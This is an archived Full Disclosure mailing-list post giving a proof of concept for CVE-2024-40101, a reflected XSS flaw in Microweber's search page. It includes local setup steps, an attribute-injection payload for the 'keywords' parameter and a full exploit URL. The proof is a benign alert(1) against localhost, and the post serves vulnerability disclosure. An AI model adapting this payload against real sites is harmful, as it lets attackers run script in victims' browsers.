[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CVE-2024-40101 exploit: Reflected Cross-Site Scripting (XSS) on Microweber
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] CVE-2024-40101 exploit: Reflected Cross-Site Scripting (XSS) on Microweber
- From: masquerad3r <masquerad3r@xxxxxxxxx>
- Date: Mon, 5 Aug 2024 10:30:05 +0200
Hello team,
Please find the attached POC for CVE-2024-40101 for publication.
Regards,
Prerak Mittal
# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)
# Date: 16.07.2024
# Exploit Author: Prerak Mittal
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15
# Version: <=v2.0.15
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-40101
# Description:
## App Installation:
1. Clone the repository and build the application using docker:
```
git clone -b v2.0.15 https://github.com/microweber/microweber.git
cd microweber
docker compose up -d
```
2. Visit http://localhost
3. Follow along the UI installation process.
## Steps to reproduce:
1. Visit http://localhost/search
2. Insert the below payload in `keywords` parameter:
"onscrollend=alert(1) style="display:block;overflow:auto;border:1px
dashed;width:500px;height:100px;"
Complete Exploit URL:
http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22
3. Scroll any of the two `div` sections created on the search results page.
Once the scroll finishes, it will trigger the alert popup._______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/